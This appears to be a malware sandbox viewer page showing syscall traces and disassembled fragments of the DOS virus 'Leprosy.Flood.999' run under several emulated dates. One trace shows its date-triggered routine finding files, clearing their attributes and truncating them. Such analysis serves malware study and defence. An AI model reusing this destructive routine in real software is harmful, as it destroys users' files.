Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Flood.999

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:46.704553764Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:42:46.706740233Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:42:46.709794387Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:42:46.710911285Z 25 PC: 12b4d | Get default drive
2018-12-17T22:42:46.712454552Z 71 PC: 12b58 | Get current directory
2018-12-17T22:42:46.715663646Z 59 PC: 12b5f | Change current directory
2018-12-17T22:42:46.719838914Z 78 PC: 12b69 | Find first file
2018-12-17T22:42:46.741298549Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:42:46.74383408Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:42:46.749582481Z 59 PC: 12c60 | Change current directory
2018-12-17T22:42:46.758608244Z 59 PC: 12c67 | Change current directory
2018-12-17T22:42:46.760774725Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:42:46.763101747Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.483495189Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.48509079Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.488101909Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.489322805Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.490698172Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.494464008Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.499030952Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.505636645Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.507875328Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.514165823Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.524497105Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.527411233Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.52964145Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.509896796Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.512101984Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.514008295Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.515083127Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.516994867Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.520162973Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.524814212Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.531692925Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.534129713Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.540345851Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.551543767Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.553682951Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.555920119Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.517946943Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.519228492Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.521499392Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.522759066Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.525302778Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.529242893Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.533612424Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.539868071Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.542219677Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.548464924Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.558170771Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.560814428Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.563115387Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T12:02:19.564150356Z 78 PC: 12c8b | Find first file
2018-12-25T12:02:19.576829552Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T12:02:19.582867525Z 60 PC: 12c9b | Create or truncate file
2018-12-25T12:02:19.606865513Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.610337845Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.621405631Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.633077828Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.636101376Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.649900831Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.662506481Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.664507513Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.672391779Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.685549466Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.688310581Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.699126158Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.715169503Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.718454922Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.729342445Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.742542345Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.745356486Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.756182014Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.769960957Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.772805122Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.783786961Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.797059286Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.799778276Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T12:02:19.811256677Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T12:02:19.82486233Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T12:02:19.827631531Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7658,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:19.701652377Z 48 PC: 12b36 | Get DOS version
2018-12-25T12:02:19.703720915Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T12:02:19.705783005Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T12:02:19.706807143Z 25 PC: 12b4d | Get default drive
2018-12-25T12:02:19.709076203Z 71 PC: 12b58 | Get current directory
2018-12-25T12:02:19.711730124Z 59 PC: 12b5f | Change current directory
2018-12-25T12:02:19.715875886Z 78 PC: 12b69 | Find first file
2018-12-25T12:02:19.722013524Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T12:02:19.723725099Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T12:02:19.729233734Z 59 PC: 12c60 | Change current directory
2018-12-25T12:02:19.737968221Z 59 PC: 12c67 | Change current directory
2018-12-25T12:02:19.740583422Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T12:02:19.742860791Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')